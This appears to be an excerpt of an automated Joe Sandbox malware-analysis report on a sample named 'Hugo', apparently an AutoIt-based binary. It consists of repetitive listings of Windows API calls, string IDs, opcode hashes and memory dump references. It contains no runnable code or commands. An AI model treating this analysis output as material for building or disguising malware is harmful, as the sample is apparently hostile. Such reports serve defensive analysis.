                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: IconLoad
                                                                                                                                                                                                              • String ID: blank$info$question$stop$warning
                                                                                                                                                                                                              • API String ID: 2457776203-404129466
                                                                                                                                                                                                              • Opcode ID: 82ae20b496ecb5283ac2b579096cd17ede92a54dcb85c530b7ed0d7eeb7ec5ed
                                                                                                                                                                                                              • Instruction ID: c8fc9a0830009da0058d7e9d410c66265f8a8e71b6309b48321f84852809102e
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 82ae20b496ecb5283ac2b579096cd17ede92a54dcb85c530b7ed0d7eeb7ec5ed
                                                                                                                                                                                                              • Instruction Fuzzy Hash: B611B73664C306BAF7055B54DC82DAA77BC9F15770FE4402BF909EA281E7F4BA407262
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
                                                                                                                                                                                                              • String ID: 0.0.0.0
                                                                                                                                                                                                              • API String ID: 642191829-3771769585
                                                                                                                                                                                                              • Opcode ID: a5bb458558d55424202c0c09717ebb2a349f37fb30ab21d8ffea9d5be5ab09ec
                                                                                                                                                                                                              • Instruction ID: fb00e73b5837a25f96adb0d8d1f99f9ac85f152925ee6df6da68765ea06aa817
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a5bb458558d55424202c0c09717ebb2a349f37fb30ab21d8ffea9d5be5ab09ec
                                                                                                                                                                                                              • Instruction Fuzzy Hash: C611DA719001197BCB247764DC4AEDE776CEF05730F0040A7F55AA6091EF789A82F761
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: _wcslen$LocalTime
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 952045576-0
                                                                                                                                                                                                              • Opcode ID: 8c7c319e6eb0175bc011ade1e7727a991b8cea288c893d4ee15d56640557b6a3
                                                                                                                                                                                                              • Instruction ID: 49942b32d890b82560a59cde5125ee7bb1cf6e89a97efa0f31e4471813e41bb3
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8c7c319e6eb0175bc011ade1e7727a991b8cea288c893d4ee15d56640557b6a3
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0C419165D11218B5CB11EBB8CC8BACFB7A8AF05360F508466E518E3121FA38E255D3A6
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,00F539E2,00000004,00000000,00000000), ref: 00F2FC41
                                                                                                                                                                                                              • ShowWindow.USER32(FFFFFFFF,00000006,?,00000000,?,00F539E2,00000004,00000000,00000000), ref: 00F6FC15
                                                                                                                                                                                                              • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,00F539E2,00000004,00000000,00000000), ref: 00F6FC98
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ShowWindow
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1268545403-0
                                                                                                                                                                                                              • Opcode ID: 2db9b6b43bf793f44b77caa6c882adf2ad4d4158bc447a6f9327a8f336361af1
                                                                                                                                                                                                              • Instruction ID: e64ff4fbcffce79ff5eb19deba00e9e2d193c48132b4dd6cc537283446356f28
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2db9b6b43bf793f44b77caa6c882adf2ad4d4158bc447a6f9327a8f336361af1
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 69415B31A5839C9EC7398B38F998B393BB5AB47320F14453CE94756A60C635AA4CF711
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • DeleteObject.GDI32(00000000), ref: 00FA37B7
                                                                                                                                                                                                              • GetDC.USER32(00000000), ref: 00FA37BF
                                                                                                                                                                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00FA37CA
                                                                                                                                                                                                              • ReleaseDC.USER32(00000000,00000000), ref: 00FA37D6
                                                                                                                                                                                                              • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00FA3812
                                                                                                                                                                                                              • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00FA3823
                                                                                                                                                                                                              • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00FA6504,?,?,000000FF,00000000,?,000000FF,?), ref: 00FA385E
                                                                                                                                                                                                              • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00FA387D
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3864802216-0
                                                                                                                                                                                                              • Opcode ID: 29b5d5af8bbaf6ce944f7c3bb39eac0c8669f83d281db5b8fb2257b073989b21
                                                                                                                                                                                                              • Instruction ID: 6305c56b907101f5a25a3fe9783856163da31a8d2fe06fd092778b0a440e7435
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 29b5d5af8bbaf6ce944f7c3bb39eac0c8669f83d281db5b8fb2257b073989b21
                                                                                                                                                                                                              • Instruction Fuzzy Hash: E731A2B21012147FEB154F50CC49FEB3BADEF4A761F044065FE099A291C6B59C41D7A0
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: NULL Pointer assignment$Not an Object type
                                                                                                                                                                                                              • API String ID: 0-572801152
                                                                                                                                                                                                              • Opcode ID: 5e8be36ee5ae6ce55987213eb65d0955967a619e24e50eb8004ddb451d57316f
                                                                                                                                                                                                              • Instruction ID: a02861ace88ead32a37fc6880433dd956cd386842dd4a5128e5de2b4ac698448
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5e8be36ee5ae6ce55987213eb65d0955967a619e24e50eb8004ddb451d57316f
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7BD1A071E0060A9FEF11CFA8C885BAEB7B5FF88714F14816AE915AB280E770DD45DB50
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetCPInfo.KERNEL32(00000000,00000000,?,7FFFFFFF,?,?,00F51B7B,00000000,00000000,?,00000000,?,?,?,?,00000000), ref: 00F5194E
                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00F51B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 00F519D1
                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00F51B7B,?,00F51B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 00F51A64
                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00F51B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 00F51A7B
                                                                                                                                                                                                                • Part of subcall function 00F43B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,00F36A79,?,0000015D,?,?,?,?,00F385B0,000000FF,00000000,?,?), ref: 00F43BC5
                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,00F51B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 00F51AF7
                                                                                                                                                                                                              • __freea.LIBCMT ref: 00F51B22
                                                                                                                                                                                                              • __freea.LIBCMT ref: 00F51B2E
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2829977744-0
                                                                                                                                                                                                              • Opcode ID: 4610e70d42826a9e5ebaae6be15bd0f5c79dcfe0e702b55c8e7937601528c8e2
                                                                                                                                                                                                              • Instruction ID: 4f5f299c86ad1fbff3d84e2dd8687809a6cfddc6a7e5ec0bdbad12ca4ab5fd18
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4610e70d42826a9e5ebaae6be15bd0f5c79dcfe0e702b55c8e7937601528c8e2
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5691B572E00216AADB218E64CC91FEE7BB5FF49322F180659EE15E7140E735ED48E760
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Variant$ClearInit
                                                                                                                                                                                                              • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                                                                                                                                                              • API String ID: 2610073882-625585964
                                                                                                                                                                                                              • Opcode ID: cdf8c403c2093c8bbe64b7ec41ba40cf35c88787307e9b12e292ed9af5ed8b0a
                                                                                                                                                                                                              • Instruction ID: 8b514f7df446a830fa6fd2789aa0b138601176e4ca95361d0b5678a689666605
                                                                                                                                                                                                              • Opcode Fuzzy Hash: cdf8c403c2093c8bbe64b7ec41ba40cf35c88787307e9b12e292ed9af5ed8b0a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9091AF71E00619ABEF25CFA5CC48FAEBBB8EF45B24F108519F505AB280D7709945DFA0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SafeArrayGetVartype.OLEAUT32(00000000,?), ref: 00F81C1B
                                                                                                                                                                                                              • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00F81C43
                                                                                                                                                                                                              • SafeArrayUnaccessData.OLEAUT32(00000000), ref: 00F81C67
                                                                                                                                                                                                              • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00F81C97
                                                                                                                                                                                                              • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00F81D1E
                                                                                                                                                                                                              • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00F81D83
                                                                                                                                                                                                              • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00F81DEF
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ArraySafe$Data$Access$UnaccessVartype
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2550207440-0
                                                                                                                                                                                                              • Opcode ID: 4315e4cfabe4000e078d81d8fce831c5e45064505646ee8feaf9149f27a80a68
                                                                                                                                                                                                              • Instruction ID: 3188afaf0ab6e810983a4fbf9e622829d043c301ecb9196cf222efebbec9e724
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4315e4cfabe4000e078d81d8fce831c5e45064505646ee8feaf9149f27a80a68
                                                                                                                                                                                                              • Instruction Fuzzy Hash: AD91F472A002199FDB01EF94C885BFEB7B8FF05721F104219E941EB291D778A942EB90
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • VariantInit.OLEAUT32(?), ref: 00F943C8
                                                                                                                                                                                                              • CharUpperBuffW.USER32(?,?), ref: 00F944D7
                                                                                                                                                                                                              • _wcslen.LIBCMT ref: 00F944E7
                                                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 00F9467C
                                                                                                                                                                                                                • Part of subcall function 00F8169E: VariantInit.OLEAUT32(00000000), ref: 00F816DE
                                                                                                                                                                                                                • Part of subcall function 00F8169E: VariantCopy.OLEAUT32(?,?), ref: 00F816E7
                                                                                                                                                                                                                • Part of subcall function 00F8169E: VariantClear.OLEAUT32(?), ref: 00F816F3
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
                                                                                                                                                                                                              • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                                                                                                                                                              • API String ID: 4137639002-1221869570
                                                                                                                                                                                                              • Opcode ID: e39c16fa0c5f8baefee09ad2afbe6a03d30f12641a9f83dca52835c0950e0a76
                                                                                                                                                                                                              • Instruction ID: ca651197b54db00686ccaf5361fe29b8cbc30991e0800443c82aa822ac100c5a
                                                                                                                                                                                                              • Opcode Fuzzy Hash: e39c16fa0c5f8baefee09ad2afbe6a03d30f12641a9f83dca52835c0950e0a76
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 98917B75A043019FCB04DF68C88096AB7E5FF99714F14892DF88A87351DB35ED46DB82
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 00F708FE: CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,00F70831,80070057,?,?,?,00F70C4E), ref: 00F7091B
                                                                                                                                                                                                                • Part of subcall function 00F708FE: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00F70831,80070057,?,?), ref: 00F70936
                                                                                                                                                                                                                • Part of subcall function 00F708FE: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00F70831,80070057,?,?), ref: 00F70944
                                                                                                                                                                                                                • Part of subcall function 00F708FE: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00F70831,80070057,?), ref: 00F70954
                                                                                                                                                                                                              • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 00F956AE
                                                                                                                                                                                                              • _wcslen.LIBCMT ref: 00F957B6
                                                                                                                                                                                                              • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 00F9582C
                                                                                                                                                                                                              • CoTaskMemFree.OLE32(?), ref: 00F95837
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
                                                                                                                                                                                                              • String ID: NULL Pointer assignment
                                                                                                                                                                                                              • API String ID: 614568839-2785691316
                                                                                                                                                                                                              • Opcode ID: 3a08651847027cb6848fd66e511f894b779b0cbdbe765b6fd77c4c957eadded0
                                                                                                                                                                                                              • Instruction ID: 46ef352419843f828883f26f4751e760810c4dfdf0b488de151e24a25e786534
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3a08651847027cb6848fd66e511f894b779b0cbdbe765b6fd77c4c957eadded0
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 47912671D0021DEBEF15DFA4DC81AEEB7B8BF08710F10416AE915A7241EB349A44EF60
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetMenu.USER32(?), ref: 00FA2C1F
                                                                                                                                                                                                              • GetMenuItemCount.USER32(00000000), ref: 00FA2C51
                                                                                                                                                                                                              • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00FA2C79
                                                                                                                                                                                                              • _wcslen.LIBCMT ref: 00FA2CAF
                                                                                                                                                                                                              • GetMenuItemID.USER32(?,?), ref: 00FA2CE9
                                                                                                                                                                                                              • GetSubMenu.USER32(?,?), ref: 00FA2CF7
                                                                                                                                                                                                                • Part of subcall function 00F74393: GetWindowThreadProcessId.USER32(?,00000000), ref: 00F743AD
                                                                                                                                                                                                                • Part of subcall function 00F74393: GetCurrentThreadId.KERNEL32 ref: 00F743B4
                                                                                                                                                                                                                • Part of subcall function 00F74393: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00F72F00), ref: 00F743BB
                                                                                                                                                                                                              • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00FA2D7F
                                                                                                                                                                                                                • Part of subcall function 00F7F292: Sleep.KERNEL32 ref: 00F7F30A
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 4196846111-0
                                                                                                                                                                                                              • Opcode ID: 864760b5ae2c1ec9239d06ff96e051c91eedb94fd07e54c2e2e047f29e07dc33
                                                                                                                                                                                                              • Instruction ID: edddd8113405db8dd8b1083efe80be791343e6ca1dbd6de3c8f1ba02a88bf7b5
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 864760b5ae2c1ec9239d06ff96e051c91eedb94fd07e54c2e2e047f29e07dc33
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3B7172B5E00205AFCB54EF68C845AAEB7F5EF49320F148459E816EB351DB34ED41EB90
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • IsWindow.USER32(00000000), ref: 00FA8992
                                                                                                                                                                                                              • IsWindowEnabled.USER32(00000000), ref: 00FA899E
                                                                                                                                                                                                              • SendMessageW.USER32(00000000,0000041C,00000000,00000000), ref: 00FA8A79
                                                                                                                                                                                                              • SendMessageW.USER32(00000000,000000B0,?,?), ref: 00FA8AAC
                                                                                                                                                                                                              • IsDlgButtonChecked.USER32(?,00000000), ref: 00FA8AE4
                                                                                                                                                                                                              • GetWindowLongW.USER32(00000000,000000EC), ref: 00FA8B06
                                                                                                                                                                                                              • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00FA8B1E
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 4072528602-0
